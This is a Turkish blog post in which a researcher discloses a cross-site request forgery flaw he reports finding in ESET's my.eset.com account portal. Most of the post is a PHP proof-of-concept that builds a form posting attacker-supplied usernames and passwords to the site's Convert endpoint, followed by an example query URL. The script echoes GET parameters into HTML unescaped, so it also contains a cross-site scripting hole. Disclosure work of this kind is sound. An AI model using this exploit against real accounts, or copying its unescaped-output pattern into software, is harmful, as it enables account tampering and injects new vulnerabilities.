ESET CSRF Zaafiyeti

ESET’te bulduğum ve bildirdiğim CSRF zaafiyeti


Translator


212 görüntülenme | 30 saniye | 2019-12-09 | alicangonullu



Exploit Date : 19.10.2019
Exploit Author : Ali Can Gönüllü
Exploit Site : my.eset.com
Poodle Of Cream:
<?php 
$user = $_GET["user"]; 
$pass = $_GET["pass"]; 
echo ' <form id="myForm" name="myForm" action="https://my.eset.com/Convert" method="post"> 
<input type="text" name="UserName" placeholder="UserName (EAV)" value="'.$user.'"><br> 
<input type="password" name="Password" placeholder="Password" value="'.$pass.'"><br> 
<input type="submit" value="Submit"> 
</form>'; 
?> 

Ex. xxx.php?user=xxx@xxx.net&pass=xxx

 


Etiketler

Bu sitede çerez verileriniz sitemizin hizmet kalitesini arttırma amacıyla işlenmek istenmektedir.


© Copyright 2020 Ali Can Gönüllü | Yasal